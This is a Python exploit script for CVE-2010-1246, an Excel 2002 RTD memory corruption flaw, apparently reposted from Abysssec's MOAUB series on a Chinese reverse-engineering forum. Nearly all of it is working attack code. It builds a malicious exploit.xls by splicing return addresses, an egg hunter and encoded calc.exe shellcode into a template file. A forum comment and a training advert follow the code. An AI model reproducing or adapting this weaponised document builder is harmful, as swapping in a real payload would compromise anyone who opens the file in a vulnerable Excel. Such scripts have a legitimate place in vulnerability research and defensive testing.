'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
0e5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1x3e0m8Q4x3X3c8W2P5r3y4W2L8q4)9J5k6s2u0@1k6q4)9J5k6r3#2W2L8h3!0J5P5g2)9J5k6r3y4G2M7Y4u0#2M7s2c8A6L8$3&6Q4x3V1j5`.
78dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8Y4y4H3L8r3!0A6N6s2y4Q4x3V1k6E0L8$3q4#2j5W2)9J5k6o6p5H3i4K6u0V1k6i4S2H3L8r3!0A6N6q4)9J5k6i4A6A6M7l9`.`.
'''
'''
Title : Excel RTD Memory Corruption
Version : Excel 2002 sp3
Analysis :
edbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4T1P5i4y4K6M7$3g2U0i4K6u0W2j5$3!0E0
Vendor :
896K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6j5%4u0G2M7$3!0X3N6q4)9J5k6h3y4G2L8b7`.`.
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1246
MOAUB Number : MOAUB_10_BA
'''
import sys
def main():
try:
fdR = open('src.xls', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:4509]
str2 = strTotal[5013:15000]
str3 = strTotal[15800:]
eip = "\xAd\x57\x00\x30" # pop pop ret
jmp = "\xF7\xC2\x03\x30" # call esp
#Egg Hunter
eggHunter = ""
eggHunter += "\x90\x90\x90"
eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"
eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"
# shellcode calc.exe
shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
if len(eggHunter) > 266:
print "
Error : Shellcode length is long"
return
if len(eggHunter) <=266:
dif =266 - len(eggHunter)
while dif > 0 :
eggHunter += '\x90'
dif = dif - 1
if len(shellcode) > 800:
print "
Error : Shellcode length is long"
return
if len(shellcode) <= 800:
dif = 800 - len(shellcode)
while dif > 0 :
shellcode += '\x90'
dif = dif - 1
fdW= open('exploit.xls', 'wb+')
fdW.write(str1)
fdW.write("\x41\x41\x41") # padding
fdW.write(jmp)
fdW.write(eggHunter)
fdW.write("\xeb\x06\x41\x41")
fdW.write(eip)
fdW.write("\x81\xc4\x24\x16\x00\x00") # add esp,2016
fdW.write("\xc3") #ret
i = 0
while i < 54 :
fdW.write("\x41\x41\x41\x41") # padding
i = i + 1
fdW.write(str2)
fdW.write(shellcode)
fdW.write(str3)
fdW.close()
fdR.close()
print '[-] Excel file generated'
except IOError:
print '
Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)
if __name__ == '__main__':
main()
看到有人把#9的转过来了,那么我也继续下,把#10的转来吧
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
